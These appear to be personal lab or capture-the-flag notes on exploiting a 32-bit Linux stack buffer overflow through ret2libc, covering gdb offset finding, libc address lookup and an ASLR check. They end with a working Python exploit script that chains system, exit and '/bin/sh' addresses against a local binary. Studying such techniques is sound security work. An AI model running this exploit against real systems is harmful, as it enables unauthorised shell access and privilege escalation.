Buffer overflow - linux

Buffer overflow - linux

• lets copy the binary to our machine to do it better :)

• install gef for gdb

  • to see the protections of the binary checksec in gdb
  • we have NX activated ⇐ meaning we cannot execute code in the stack
  • pattern create give you a pattern
  • run "<pattern here>"
  • pattern offset $eip ← shows we have a 52 bytes to exploit

• ret2libc since we have NX active (stack execution protection) → we need to use

  • we need addr for system /bin/sh and exit
  • in the victim machine we can 1 get the base addr of libcc
    • ldd <binary> → 0xb7e1900
  • get the offsets of system and exit
    • readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
    • we get the value of the system@@GLIBC_2.0 → 0003ada0
    • exit → 0002e9d0
    • to get the offset of a /bin/sh occurence:
      • strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh → 15ba0b
  • to get the full address of the
  • ret2libc = addr_of_system + addr_of_exit + addr_of_bin_sh

• is aslr active? cat /proc/sys/kernel/randomize_va_space (0 means no, 2 means yes)

buffer script as s4vitar

from struct import pack
from subprocess import call

RELLENO = "A"*52

base = 0xb7e19000
system_off =  0x0003ada0
exit_off = 0x0002e9d0
sh_off = 0x15ba0b


system = base + system_off
_exit = exit_off + base
sh = sh_off + base

payload = RELLENO + pack("<I", system) + pack("<I", _exit) + pack("<I", sh)

call(["/home/ayush/.binary/rop", payload])
print(payload)